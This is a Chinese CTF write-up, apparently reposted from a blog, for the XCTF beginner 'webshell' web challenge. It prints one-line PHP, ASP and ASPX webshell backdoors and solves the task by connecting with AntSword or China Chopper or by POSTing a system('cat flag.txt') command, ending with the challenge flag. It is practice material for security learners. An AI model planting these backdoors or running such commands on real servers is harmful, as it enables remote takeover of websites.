XCTF篇:Web (新手练习题)之 webshell


当你的才华

还撑不起你的野心时

那你就应该静下心来学习


目录

Web (新手练习题)之 webshell

0x01 前言

0x02 补充知识:

webshell

0x03 解题思路


Web (新手练习题)之 webshell

0x01 前言

想玩玩攻防世界的朋友,CE已附上XCTF Web 练习题传送门:https://adworld.xctf.org.cn/

难度系数: 一星

题目来源: Cyberpeace-n3k0

题目描述:小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。

 

0x02 补充知识:

webshell

维基百科:

      webshell(分类为远程访问木马)是作为一个基于网络的实现的网络安全威胁shell概念。 Webshell可以上传到Web服务器,以
      允许远程访问Web服务器,例如Web服务器的文件系统。
Webshell的独特之处在于它使用户能够通过充当命令行界面的Web浏览器访问Web服务器。用户可以使用Web浏览器通过万维网访问远程计算机在任何类型的系统上,无论是台式计算机还是带有Web浏览器的手机,都可以在远程系统上执行任务。主机或客户端都不需要命令行环境。

      简单的说webshell就是web后门,比如php,asp木马后门。黑客在入侵了一个网站后,常常在将这些 asp或php木马后门文件放置在网站服务器的web目录中,与正常的网页文件混在一起。然后就可以用web的方式,通过asp或php木马后门控制网站服务器,包括上传下载文件、查看数据库、执行任意程序命令等。

      Web shell通过Web应用程序中的漏洞或弱服务器安全配置上传,包括以下内容:

  • SQL注入 ;
  • 应用程序和服务中的漏洞(例如NGINX等Web服务器软件或WordPress等内容管理系统应用程序);
  • 文件处理和上传漏洞(例如限制可上传的文件类型);
  • 远程文件包含(RFI)和本地文件包含(LFI)漏洞;
  • 远程代码执行 ;
  • 暴露的管理界面;
  • 跨站脚本

php 一句话木马:

<?php @eval($_POST[value]); ?>

asp 一句话木马:

<%eval request ("value")%> 
或  
<% execute(request("value")) %>   

aspx 一句话木马:

<%@ Page Language="Jscript" %>
或
<% eval(Request.Item["value"]) %>

0x03 解题思路

1、访问解题的URL,直接提示你会使用Webshell 嘛?太明显了,而且还把php一句话木马给显示出来,不等着你盘它嘛?

2、恭敬不如从命,直接上菜刀或蚁剑连接,此处用蚁剑链接:

注意蚁剑加载器仅在 https://github.com/AntSwordProject/AntSword-Loader 发布,下载后请第一时间校验 md5 值。

或中国菜刀

当然,也可以使用hackbar,使用post方式传递shell=system('cat flag.txt'); 获得flag

PS:这种我不是特别推荐,都知道shell的前提下,何必这么麻烦了,影响自己的效率。

首先看看当前shell下有哪些文件,发现存在flag.txt

查看flag.txt 获得Flag

3、连接后在网站目录下发现了flag.txt文件,下载flag.txt 文件到本地

4、保存到本地

5、用Notepad++ 查看文件可获得flag

cyberpeace{e62607a839cd3c4c93571e76a20cc627}


我不需要自由,只想背着她的梦

一步步向前走,她给的永远不重


发布了178 篇原创文章 · 获赞 75 · 访问量 10万+

猜你喜欢

转载自blog.csdn.net/God_XiangYu/article/details/100697866